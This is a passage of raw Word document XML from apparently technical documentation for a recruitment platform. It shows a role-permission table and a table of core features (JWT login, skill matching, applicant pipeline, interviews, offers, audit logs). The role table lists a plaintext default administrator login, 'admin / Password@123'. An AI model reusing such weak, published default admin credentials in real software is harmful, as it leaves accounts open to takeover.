          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Create and publish job requisitions, view applicant pipelines, move candidate stages (Screening, Shortlist, etc.), schedule interviews with meeting URLs, generate formal offers, export applicants to CSV.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Cannot view candidate passwords, edit platform users, or delete audit logs.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Platform Administrator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1728"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ROLE_ADMIN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>admin / Password@123</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2592"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>View platform KPI metrics, toggle user status (Active vs Suspend), delete improper job postings, inspect system-wide audit logs and security events.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Cannot alter candidate applications or tamper with historical audit logs.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E3A8A"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>6. Core Features Breakdown</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="0F172A"/>
        </w:rPr>
        <w:t>The platform incorporates eight core production-grade feature modules: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2412"/>
        <w:gridCol w:w="2412"/>
        <w:gridCol w:w="2412"/>
        <w:gridCol w:w="2412"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Feature Module</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Primary Actor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Technical Implementation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:fill="1E3A8A"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Verification Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Stateless JWT Authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>All Personas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Spring Security 6, JJWT 0.12.5, BCrypt password hashing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>🟢 CONFIRMED FROM CODE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Intelligent Skill Match Engine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Candidate / Recruiter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>CandidateProfileService, weighted Jaccard/overlap calculation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>🟢 CONFIRMED FROM CODE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>1-Click Job Application</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Candidate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>POST /api/jobs/{id}/apply with duplicate check</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>🟢 CONFIRMED FROM CODE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Recruiter ATS Pipeline</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Recruiter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>7-stage state transitions with Kanban stepper</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>🟢 CONFIRMED FROM CODE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Interview Scheduling &amp; Dispatch</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Recruiter / Candidate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>POST /api/interviews/schedule with Google Meet URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>🟢 CONFIRMED FROM CODE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Binding Offer Engine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Recruiter / Candidate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>POST /api/offers, PUT /api/offers/{id}/respond</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>🟢 CONFIRMED FROM CODE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Saved Jobs / Bookmarks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Candidate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>POST/DELETE /api/saved-jobs/{id} with optimistic UI sync</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:fill="FFFFFF"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>🟢 CONFIRMED FROM CODE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2160"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Admin Governance &amp; Audit Stream</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1584"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3600"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>AdminController, AuditLogService, user status toggle</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2304"/>
            <w:shd w:fill="F8FAFC"/>
            <w:tcMar>
              <w:top w:w="80" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
              <w:left w:w="120" w:type="dxa"/>
              <w:right w:w="120" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="0F172A"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>🟢 CONFIRMED FROM CODE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="1E3A8A"/>
          <w:sz w:val="32"/>
        </w:rPr>
